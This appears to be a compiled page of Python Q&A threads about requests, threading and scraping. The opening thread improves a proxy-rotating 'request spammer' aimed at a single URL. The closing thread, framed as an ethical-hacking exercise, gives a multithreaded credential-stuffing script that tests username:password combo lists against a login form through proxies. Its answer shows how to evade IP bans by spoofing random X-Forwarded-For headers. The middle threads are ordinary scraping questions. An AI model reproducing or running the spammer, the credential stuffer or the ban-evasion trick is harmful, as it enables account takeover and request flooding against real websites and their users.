How would I handle the multithreading better in my request spammer - Python

I have a little Python script for spamming requests to a URL using Requests. It uses proxies so the IPs are random, and I have a text file called https.txt with over two thousand proxies that I've collected.
I attempted to multithread the program, but I feel like my current approach isn't ideal. Any advice on how to improve it would be much appreciated.
from colorama import Fore, Back, Style, init
import requests
import threading

init()

# constant vars
link = ""  # URL goes here
agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
referer = ""
proxies = open("https.txt", "r")

# dynamic vars
threadLock = threading.Lock()
threads = []
num = 0


class myThread(threading.Thread):
    def __init__(self, threadID, name, counter, proxy):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.name = name
        self.counter = counter
        self.proxy = proxy

    def run(self):
        # print("Starting " + self.name)
        spam(self.name, self.proxy)  # use the proxy stored on this thread


# Each thread runs this function once
def spam(threadName, proxy):
    try:
        headers = {
            "user-agent": agent,
            "referer": referer
        }
        req = requests.get(url=link, headers=headers, proxies=proxy, timeout=100)
        status = req.status_code
        req.close()
        if status == 200:
            print(Fore.CYAN + threadName + ": Working request with proxy: " + Fore.YELLOW + proxy["https"])
        else:
            print(Fore.GREEN + threadName + ": Connection Code Status Error:", status)
    except IOError:
        print(Fore.RED + threadName + ": Connection error - Bad Proxy")


# One thread per proxy line
for x in proxies:
    thread = str(num)
    num = num + 1
    proxy = {
        "https": x.strip()
    }
    thread = myThread(thread, "Thread-" + thread, num, proxy)
    thread.start()
    threads.append(thread)  # keep a handle so the threads can be joined below

# Wait for all threads to complete
for t in threads:
    t.join()
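For comparison, here is a minimal sketch of the same idea using concurrent.futures.ThreadPoolExecutor, which caps the number of live threads instead of starting one thread per proxy; the pool size of 50 is an arbitrary assumption, and link and https.txt are carried over from the code above.
import concurrent.futures
import requests

link = ""  # URL goes here, as above


def spam(proxy_line):
    # Send one request through one https proxy read from https.txt (assumed one proxy per line)
    proxy = {"https": proxy_line}
    try:
        resp = requests.get(link, proxies=proxy, timeout=30)
        return proxy_line, resp.status_code
    except IOError:
        return proxy_line, None  # bad proxy / connection error


with open("https.txt") as f:
    proxy_lines = [line.strip() for line in f if line.strip()]

# A fixed-size pool bounds the thread count instead of spawning 2000+ threads at once
with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
    for proxy_addr, status in executor.map(spam, proxy_lines):
        print(proxy_addr, status)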

Related

Python Django: how to prevent the code after a for loop from running before the loop finishes

import requests
from django.http import JsonResponse


def redirectTest(item):
    try:
        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
        }
        r = None
        try:
            r = requests.head(item, allow_redirects=False, headers=headers)
        except Exception as e:
            print(e)
        if r is not None:
            if r.status_code == 301:
                print("Tested: " + str(r.status_code))
            elif r.status_code == 302:
                print("Tested: " + str(r.status_code))
            else:
                print("Tested: " + str(r.status_code))
    except requests.exceptions.RequestException as e:
        print('error: ' + str(e))
        return


#ensure_csrf_cookie
def re_check_url(request):
    if request.method == "POST":
        if request.is_ajax():
            resolved_urls = ['twitch.tv/yumyumyu77']
            scheme_list = ['http://www.', 'http://', 'https://www.', 'https://']
            for item in resolved_urls:
                for scheme_item in scheme_list:
                    redirectTest(scheme_item + item)
            return JsonResponse({'res': 1})
    return JsonResponse({'res': 2})
This code checks the responses for each scheme + URL combination.
But when I execute the code, my Django terminal prints:
r_status_code: 301
r_status_code: 301
r_status_code: 200
[22/Oct/2018 23:54:49] "POST /re/check/url/ HTTP/1.1" 200 10
r_status_code: 301
Problem:
I think this means that the line return JsonResponse({'res': 1}) runs first, and the line print("Tested: " + str(r.status_code)) runs afterwards.
Sometimes the output appears in the expected order, but sometimes it doesn't.
Question:
I learned that Python code is executed line by line from top to bottom, but it doesn't seem to be doing so here.
Why does this happen, and how can I fix it?
The execution order is not what I expected.
Edit:
I tried to use Lock()
for item in resolved_urls:
    for scheme_item in scheme_list:
        from threading import Lock
        _lock = Lock()
        with _lock:
            redirectTest(scheme_item + item)
But it does not seem to be working well.
Everything is actually working correctly. 200 is success, and it redirects to the success page. Then it runs your last loop.

Python - Can't Get Counter To Work in Multiprocessing Environment (Pool, Map)

I need the counter variable (list_counter) inside my 'scraper' function to increment for each iteration through list1.
The problem is it's assigning a counter to each individual process.
I want each process to simply increment the global list_counter at the end of the loop, not for each process to have its own counter.
I tried passing the variable as an argument but couldn't get it to work that way either.
What do you guys think? Is it even possible to have a global counter work across multiple processes - specifically using Pool, map, and a Lock?
from multiprocessing import Lock, Pool
from time import sleep
from bs4 import BeautifulSoup
import re
import requests

exceptions = []
lock = Lock()
list_counter = 0


def scraper(url):  # url is tied to the individual list items
    """
    Testing multiprocessing and requests
    """
    global list_counter
    lock.acquire()
    try:
        scrape = requests.get(url,
                              headers={"user-agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"},
                              timeout=10)
        if scrape.status_code == 200:
            """ --------------------------------------------- """
            # ---------------------------------------------------
            ''' --> SCRAPE ALEXA RANK: <-- '''
            # ---------------------------------------------------
            """ --------------------------------------------- """
            sleep(0.1)
            scrape = requests.get("http://data.alexa.com/data?cli=10&dat=s&url=" + url,
                                  headers={"user-agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"})
            html = scrape.content
            soup = BeautifulSoup(html, 'lxml')
            rank = re.findall(r'<popularity[^>]*text="(\d+)"', str(soup))
            print("Server Status:", scrape.status_code, '-', u"\u2713", '-', list_counter, '-', url, '-', "Rank:", rank[0])
            list_counter = list_counter + 1
        else:
            print("Server Status:", scrape.status_code)
            list_counter = list_counter + 1
            print(list_counter)
    except BaseException as e:
        exceptions.append(e)
        print()
        print(e)
        print()
        list_counter = list_counter + 1
        print(list_counter)
    finally:
        lock.release()


if __name__ == '__main__':
    list1 = ["http://www.wallstreetinvestorplace.com/2018/04/cvs-health-corporation-cvs-to-touch-7-54-earnings-growth-for-next-year/",
"https://macondaily.com/2018/04/06/cetera-advisors-llc-lowers-position-in-cvs-health-cvs.html",
"http://www.thesportsbank.net/football/liverpool/jurgen-klopp-very-positive-about-mo-salah-injury/",
"https://www.moneyjournals.com/trump-wasting-time-trying-bring-amazon/",
"https://www.pmnewsnigeria.com/2018/04/06/fcta-targets-800000-children-for-polio-immunisation/",
"http://toronto.citynews.ca/2018/04/06/officials-in-canada-braced-for-another-spike-in-illegal-border-crossings/",
"https://www.pmnewsnigeria.com/2018/04/04/pdp-describes-looters-list-as-plot-to-divert-attention/",
"https://beyondpesticides.org/dailynewsblog/2018/04/epa-administrator-pruitt-colluding-regulated-industry/",
"http://thyblackman.com/2018/04/06/robert-mueller-is-searching-for/",
"https://www.theroar.com.au/2018/04/06/2018-commonwealth-games-swimming-night-2-finals-live-updates-results-blog/",
"https://medicalresearch.com/pain-research/migraine-linked-to-increased-risk-of-heart-disease-and-stroke/40858/",
"http://www.investingbizz.com/2018/04/amazon-com-inc-amzn-stock-creates-investors-concerns/",
"https://stocknewstimes.com/2018/04/06/convergence-investment-partners-llc-grows-position-in-amazon-com-inc-amzn.html",
"https://factsherald.com/old-food-rules-needs-to-be-updated/",
"https://www.nextadvisor.com/blog/2018/04/06/the-facebook-scandal-evolves/",
"http://sacramento.cbslocal.com/2018/04/04/police-family-youtube-shooter/",
"http://en.brinkwire.com/245768/why-does-stress-lead-to-weight-gain-study-sheds-light/",
"https://www.marijuana.com/news/2018/04/monterey-bud-jeff-sessions-is-on-the-wrong-side-of-history-science-and-public-opinion/",
"http://www.stocksgallery.com/2018/04/06/jpmorgan-chase-co-jpm-noted-a-price-change-of-0-80-and-amazon-com-inc-amzn-closes-with-a-move-of-2-92/",
"https://stocknewstimes.com/2018/04/06/front-barnett-associates-llc-has-2-41-million-position-in-cvs-health-corp-cvs.html",
"http://www.liveinsurancenews.com/colorado-mental-health-insurance-bill-to-help-consumers-navigate-the-system/",
"http://newyork.cbslocal.com/2018/04/04/youtube-headquarters-shooting-suspect/",
"https://ledgergazette.com/2018/04/06/liberty-interactive-co-series-a-liberty-ventures-lvnta-shares-bought-by-brandywine-global-investment-management-llc.html",
"http://bangaloreweekly.com/2018-04-06-city-holding-co-invests-in-cvs-health-corporation-cvs-shares/",
"https://www.thenewsguru.com/didnt-know-lawyer-paid-prostitute-130000-donald-trump/",
"http://www.westlondonsport.com/chelsea/football-wls-conte-gives-two-main-reasons-chelseas-loss-tottenham",
"https://registrarjournal.com/2018/04/06/amazon-com-inc-amzn-shares-bought-by-lenox-wealth-management-inc.html",
"http://www.businessdayonline.com/1bn-eca-withdrawal-commence-action-president-buhari-pdp-tasks-nass/",
"http://www.thesportsbank.net/football/manchester-united/pep-guardiola-asks-for-his-fans-help-vs-united-in-manchester-derby/",
"https://www.pakistantoday.com.pk/2018/04/06/three-palestinians-martyred-as-new-clashes-erupt-along-gaza-border/",
"http://www.nasdaqfortune.com/2018/04/06/risky-factor-of-cvs-health-corporation-cvs-is-observed-at-1-03/",
"https://stocknewstimes.com/2018/04/06/cetera-advisor-networks-llc-decreases-position-in-cvs-health-cvs.html",
"http://nasdaqjournal.com/index.php/2018/04/06/planet-fitness-inc-nyseplnt-do-analysts-think-you-should-buy/",
"http://www.tv360nigeria.com/apc-to-hold-national-congress/",
"https://www.pmnewsnigeria.com/2018/04/03/apc-governors-keep-sealed-lips-after-meeting-with-buhari/",
"https://www.healththoroughfare.com/diet/healthy-lifestyle-best-foods-you-should-eat-for-weight-loss/7061",
"https://stocknewstimes.com/2018/04/05/amazon-com-inc-amzn-shares-bought-by-west-oak-capital-llc.html",
"http://www.current-movie-reviews.com/48428/dr-oz-could-you-be-a-victim-of-sexual-assault-while-on-vacation/",
"https://www.brecorder.com/2018/04/07/410124/world-health-day-to-be-observed-on-april-7/",
"http://www.coloradoindependent.com/169637/trump-pruitt-emissions-epa-pollution",
"https://thecrimereport.org/2018/04/05/will-sessions-new-justice-strategy-turn-the-clock-back-on-civil-rights/",
"http://en.brinkwire.com/245490/pasta-unlikely-to-cause-weight-gain-as-part-of-a-healthy-diet/"]
    p = Pool(15)  # thread count
    p.map(scraper, list1)  # (function, iterable)
    p.terminate()
    p.join()
You can use concurrent.futures
import concurrent.futures
import urllib.request
from time import sleep
from bs4 import BeautifulSoup
import re
import requests

exceptions = []  # collects errors raised inside scraper


def scraper(url):
    list_counter = 0
    try:
        scrape = requests.get(url,
                              headers={"user-agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"},
                              timeout=10)
        if scrape.status_code == 200:
            sleep(0.1)
            scrape = requests.get("http://data.alexa.com/data?cli=10&dat=s&url=" + url,
                                  headers={"user-agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"})
            html = scrape.content
            soup = BeautifulSoup(html, 'lxml')
            rank = re.findall(r'<popularity[^>]*text="(\d+)"', str(soup))
            print("Server Status:", scrape.status_code, '-', u"\u2713", '-', list_counter, '-', url, '-', "Rank:", rank[0])
            list_counter = list_counter + 1
        else:
            print("Server Status:", scrape.status_code)
            list_counter = list_counter + 1
            print(list_counter)
    except BaseException as e:
        exceptions.append(e)
        print()
        print(e)
        print()
        list_counter = list_counter + 1
        print(list_counter)


def load_url(url, timeout):
    with urllib.request.urlopen(url, timeout=timeout) as conn:
        return conn.read()


list1 = []  # copy your list here (omitted in order to save space)

with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
    future_to_url = {executor.submit(load_url, url, 50): url for url in list1}
    for future in concurrent.futures.as_completed(future_to_url):
        url = future_to_url[future]
        try:
            data = future.result()
        except Exception as exc:
            print('%r generated an exception: %s' % (url, exc))
        else:
            print('%r page is %d bytes' % (url, len(data)))

with concurrent.futures.ProcessPoolExecutor() as executor:
    for n, p in zip(list1, executor.map(scraper, list1)):
        print(n, p)
You will get output like this (just a few lines):
http://www.coloradoindependent.com/169637/trump-pruitt-emissions-epa-pollution None
Server Status: 200 - ✓ - 0 - https://thecrimereport.org/2018/04/05/will-sessions-new-justice-strategy-turn-the-clock-back-on-civil-rights/ - Rank: 381576
https://thecrimereport.org/2018/04/05/will-sessions-new-justice-strategy-turn-the-clock-back-on-civil-rights/ None
Server Status: 200 - ✓ - 0 - http://en.brinkwire.com/245490/pasta-unlikely-to-cause-weight-gain-as-part-of-a-healthy-diet/ - Rank: 152818
http://en.brinkwire.com/245490/pasta-unlikely-to-cause-weight-gain-as-part-of-a-healthy-diet/ None
Processes do not share memory between them. But you can use a Manager from the multiprocessing module so that the processes can manipulate the same object:
manager = multiprocessing.Manager()
list_counter = manager.list()
You will have to pass list_counter to the scraper function.
Note that the list created by the manager is thread/process safe.
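A minimal sketch of that approach, assuming a managed list plus a managed lock passed to each worker; the worker body below is a stand-in for the scraper, and the URLs are placeholders.
import multiprocessing


def scraper(args):
    url, list_counter, lock = args      # the shared manager objects arrive through the argument tuple
    with lock:                          # the managed lock keeps increments from interleaving
        list_counter.append(url)        # appending to the managed list acts as the shared counter
        print(len(list_counter), url)


if __name__ == '__main__':
    manager = multiprocessing.Manager()
    list_counter = manager.list()       # shared, process-safe list
    lock = manager.Lock()               # shared lock proxy (a module-level Lock() is not shared between pool processes)
    urls = ["https://example.com/a", "https://example.com/b"]  # placeholder URLs
    with multiprocessing.Pool(4) as pool:
        pool.map(scraper, [(u, list_counter, lock) for u in urls])
    print("total:", len(list_counter))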

Python2 BeautifulSoup returns Blank output

This is the code I am using to download images from a Google search page. It takes a long time evaluating and downloading the images, so I thought of using the BeautifulSoup library for faster evaluation and downloading. Here is the original code:
import time
import sys
import os
import urllib2

search_keyword = ['Australia']
keywords = [' high resolution']


def download_page(url):
    import urllib2
    try:
        headers = {}
        headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
        req = urllib2.Request(url, headers=headers)
        response = urllib2.urlopen(req)
        page = response.read()
        return page
    except:
        return "Page Not found"


def _images_get_next_item(s):
    start_line = s.find('rg_di')
    if start_line == -1:
        end_quote = 0
        link = "no_links"
        return link, end_quote
    else:
        start_line = s.find('"class="rg_meta"')
        start_content = s.find('"ou"', start_line+1)
        end_content = s.find(',"ow"', start_content+1)
        content_raw = str(s[start_content+6:end_content-1])
        return content_raw, end_content


def _images_get_all_items(page):
    items = []
    while True:
        item, end_content = _images_get_next_item(page)
        if item == "no_links":
            break
        else:
            items.append(item)
            time.sleep(0.1)
            page = page[end_content:]
    return items


t0 = time.time()
i = 0
while i < len(search_keyword):
    items = []
    iteration = "Item no.: " + str(i+1) + " -->" + " Item name = " + str(search_keyword[i])
    print (iteration)
    print ("Evaluating...")
    search_keywords = search_keyword[i]
    search = search_keywords.replace(' ', '%20')
    try:
        os.makedirs(search_keywords)
    except OSError, e:
        if e.errno != 17:
            raise
        pass
    j = 0
    while j < len(keywords):
        pure_keyword = keywords[j].replace(' ', '%20')
        url = 'https://www.google.com/search?q=' + search + pure_keyword + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
        raw_html = (download_page(url))
        time.sleep(0.1)
        items = items + (_images_get_all_items(raw_html))
        j = j + 1
    print ("Total Image Links = " + str(len(items)))
    print ("\n")
    info = open('output.txt', 'a')
    info.write(str(i) + ': ' + str(search_keyword[i-1]) + ": " + str(items) + "\n\n\n")
    info.close()
    t1 = time.time()
    total_time = t1 - t0
    print("Total time taken: " + str(total_time) + " Seconds")
    print ("Starting Download...")
    k = 0
    errorCount = 0
    while k < len(items):
        from urllib2 import Request, urlopen
        from urllib2 import URLError, HTTPError
        try:
            req = Request(items[k], headers={"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
            response = urlopen(req, None, 15)
            output_file = open(search_keywords + "/" + str(k+1) + ".jpg", 'wb')
            data = response.read()
            output_file.write(data)
            response.close()
            print("completed ====> " + str(k+1))
            k = k+1
        except IOError:
            errorCount += 1
            print("IOError on image " + str(k+1))
            k = k+1
        except HTTPError as e:
            errorCount += 1
            print("HTTPError" + str(k))
            k = k+1
        except URLError as e:
            errorCount += 1
            print("URLError " + str(k))
            k = k+1
    i = i+1
    print("\n")

print("Everything downloaded!")
print("\n" + str(errorCount) + " ----> total Errors")
I thought editing the code below would make it work with the BeautifulSoup library and complete my work faster:
def download_page(url):
    import urllib2
    try:
        headers = {}
        headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
        req = urllib2.Request(url, headers=headers)
        #response = urllib2.urlopen(req)
        #page = response.read()
        return BeautifulSoup(urlopen(Request(req)), 'html.parser')
    except:
        return "Page Not found"
But the above code returns blank output. Please let me know what I can do to make the code work properly with BeautifulSoup.
You can't just pass headers to Google like that. The search engine is a lot more complex than simply substituting some keywords into a GET URL.
HTML is a markup language only useful for one-way rendering of human-readable information. For your application, you need machine-readable markup rather than trying to decipher human-readable text. Google already has a very comprehensive API, https://developers.google.com/custom-search/, which is easy to use and a much better way of achieving this than using BeautifulSoup.
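For illustration, a rough sketch of fetching image links through that API with requests instead of scraping HTML; the API key and search engine ID are placeholders you would create in the Google console, and the parameter names (searchType, num) and the items[].link field should be verified against the Custom Search JSON API docs.
import requests

API_KEY = "YOUR_API_KEY"           # placeholder: create one in the Google Cloud console
SEARCH_ENGINE_ID = "YOUR_CX_ID"    # placeholder: a Programmable Search Engine ID


def image_search(query, count=10):
    # Ask the Custom Search JSON API for image results (machine-readable JSON, no HTML scraping)
    params = {
        "key": API_KEY,
        "cx": SEARCH_ENGINE_ID,
        "q": query,
        "searchType": "image",
        "num": count,
    }
    resp = requests.get("https://www.googleapis.com/customsearch/v1", params=params, timeout=15)
    resp.raise_for_status()
    return [item["link"] for item in resp.json().get("items", [])]


print(image_search("Australia high resolution"))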

the downloaded image's content-length is zero

I use Python to download images from a website; sometimes the downloaded image's content length is zero, even though the image can be accessed normally in a web browser.
I have tried three methods and get the same result, so how can I resolve this problem?
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 20 13:51:42 2017
"""
import urllib
import urllib2
import re
import uuid
import os
import requests
from lxml import etree
from multiprocessing import Pool

url = 'https://www.sina.com.cn/'
user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'
request = urllib2.Request(url)
request.add_header('User-Agent', user_agent)
response = urllib2.urlopen(request)
content = response.read()
tree = etree.HTML(content, parser=etree.HTMLParser(encoding='utf-8'))
node = tree.xpath("//img/@src")
dic1 = {}
dic2 = {}
localPath = 'E:\\pictures\\'


def generateFileName():
    return str(uuid.uuid1())


def createFileWithFileName(localPathParam, fileName):
    totalPath = localPathParam + '\\' + fileName
    if not os.path.exists(totalPath):
        file = open(totalPath, 'wb')
        file.close()
    return totalPath


def worker(i):
    path = node[i]
    if not (dic1.has_key(path)):
        dic1[path] = 1
        index = path.rfind('/')
        suffix = path[index+1:]
        filename = suffix
        #filename = generateFileName()+'.'+suffix
        if(re.search(r'^(https?:)?\/\/', path)):
            #print('save picture %s as %s' % (path,filename))
            '''
            #this code get the same result too
            try:
                urllib.urlretrieve(path, createFileWithFileName(localPath, filename))
            except Exception, ex:
                print(ex.message)
            '''
            with open(localPath + filename, 'wb') as handle:
                response = requests.get(path, timeout=60)
                if not response.ok:
                    print response
                else:
                    print 'wrong when get ' + path
                for block in response.iter_content(1024):
                    if not block:
                        break
                    handle.write(block)
            '''
            #this code get the same result too
            try:
                req = urllib2.Request(path)
                req.add_header('User-Agent', user_agent)
                picture = urllib2.urlopen(url=path, timeout=5).read()
                document = open(localPath+filename,'wb')
                document.write(picture)
                document.close()
            except Exception, ex:
                print(ex.message)
            '''


if __name__ == '__main__':
    p = Pool()
    for i in range(len(node)):
        p.apply_async(worker, args=(i,))
    print 'Waiting for all subprocesses done...'
    p.close()
    p.join()
    print 'All subprocesses done.'

Sending Asynchronous requests with Python requests library

As part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests to a website using proxies. To do that, I've come up with the following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from time import sleep
from math import ceil  # used for the combos/min summary at the end

global proxy_queue
global user_queue
global hits
global stats
global start_time


def get_default_header():
    return {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'https://www.example.com/'
    }


def make_requests():
    global user_queue
    while True:
        uname_pass = user_queue.get().split(':')
        status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
        if status == 1:
            hits.put(uname_pass)
            stats['hits'] += 1
        if status == 0:
            stats['fake'] += 1
        if status == -1:
            user_queue.put(':'.join(uname_pass))
            stats['IP Banned'] += 1
        if status == -2:
            stats['Exception'] += 1
        user_queue.task_done()


def get_status(uname, password):
    global proxy_queue
    try:
        if proxy_queue.empty():
            print 'Reloaded proxies, sleeping for 2 mins'
            sleep(120)
        session = requests.session()
        proxy = 'http://' + proxy_queue.get()
        login_url = 'http://example.com/login'
        header = get_default_header()
        header['X-Forwarded-For'] = '8.8.8.8'
        login_page = session.get(
            login_url,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        tree = html.fromstring(login_page.text)
        csrf = list(set(tree.xpath("//input[@name='csrfmiddlewaretoken']/@value")))[0]
        payload = {
            'email': uname,
            'password': password,
            'csrfmiddlewaretoken': csrf,
        }
        result = session.post(
            login_url,
            data=payload,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        if result.status_code == 200:
            if 'access_token' in session.cookies:
                return 1
            elif 'Please check your email and password.' in result.text:
                return 0
            else:
                # IP banned
                return -1
        else:
            # IP banned
            return -1
    except Exception as e:
        print e
        return -2


def populate_proxies():
    global proxy_queue
    proxy_queue = Queue()
    with open('nice_proxy.txt', 'r') as f:
        for line in f.readlines():
            proxy_queue.put(line.replace('\n', ''))


def hit_printer():
    while True:
        sleep(5)
        print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),


if __name__ == '__main__':
    global user_queue
    global proxy_queue
    global stats
    global start_time
    stats = dict()
    stats['hits'] = 0
    stats['fake'] = 0
    stats['IP Banned'] = 0
    stats['Exception'] = 0
    threads = 200
    hits = Queue()
    uname_password_file = '287_uname_pass.txt'
    populate_proxies()
    user_queue = Queue(threads)
    for i in range(threads):
        t = Thread(target=make_requests)
        t.daemon = True
        t.start()
    hit_printer = Thread(target=hit_printer)
    hit_printer.daemon = True
    hit_printer.start()
    start_time = time.time()
    try:
        count = 0
        with open(uname_password_file, 'r') as f:
            for line in f.readlines():
                count += 1
                if count > 2000:
                    break
                user_queue.put(line.replace('\n', ''))
        user_queue.join()
        print '####################Result#####################'
        while not hits.empty():
            print hits.get()
        ttr = round(time.time() - start_time, 3)
        print 'Time required: ' + str(ttr)
        print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
    except Exception as e:
        print e
So it is expected to make many requests to the website through multiple threads, but it doesn't work as expected. After a few requests, the proxies get banned and it stops working. Since I'm disposing of each proxy after I use it, that shouldn't be the case. So I believe it might be due to one of the following:
In an attempt to make multiple requests using multiple sessions, it's somehow failing to keep them separate because it doesn't support asynchronicity.
The victim site bans IPs by group, e.g. banning all IPs starting with 132.x.x.x after receiving multiple requests from any of the 132.x.x.x IPs.
The victim site is using headers like 'X-Forwarded-For', 'Client-IP', 'Via', or a similar header to detect the originating IP. But that seems unlikely, because I can log in via my browser without any proxy and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I am unsure whether I'm making an error in the threading part or the requests part; any help is appreciated.
I have figured out what the problem was, thanks to @Martijn Pieters; as usual, he's a lifesaver.
I was using elite-level proxies and there was no way the victim site could have found my IP address; however, it was using X-Forwarded-For to detect my root IP address.
Since elite-level proxies do not expose the IP address and don't attach the Client-IP header, the only way the victim could detect my IP was via the latest address in X-Forwarded-For. The solution to this problem is setting the X-Forwarded-For header to a random IP address every time a request is made, which successfully spoofs the victim site into believing that the request is legitimate.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])
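Put together, a small sketch of how that header can be randomized on every request; the login URL and proxy below are placeholders, not the real target.
import random
import requests


def random_ip():
    # Build a random dotted-quad string for the X-Forwarded-For header
    return '.'.join(str(random.randint(0, 255)) for _ in range(4))


def fetch_login_page(session, login_url, proxy):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
        'X-Requested-With': 'XMLHttpRequest',
        'X-Forwarded-For': random_ip(),  # fresh random value on every call
    }
    return session.get(login_url, headers=headers, proxies={'http': proxy}, timeout=10)


# usage sketch with placeholder values, matching the structure of the code above
session = requests.session()
resp = fetch_login_page(session, 'http://example.com/login', 'http://127.0.0.1:8080')
print(resp.status_code)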

Categories

Resources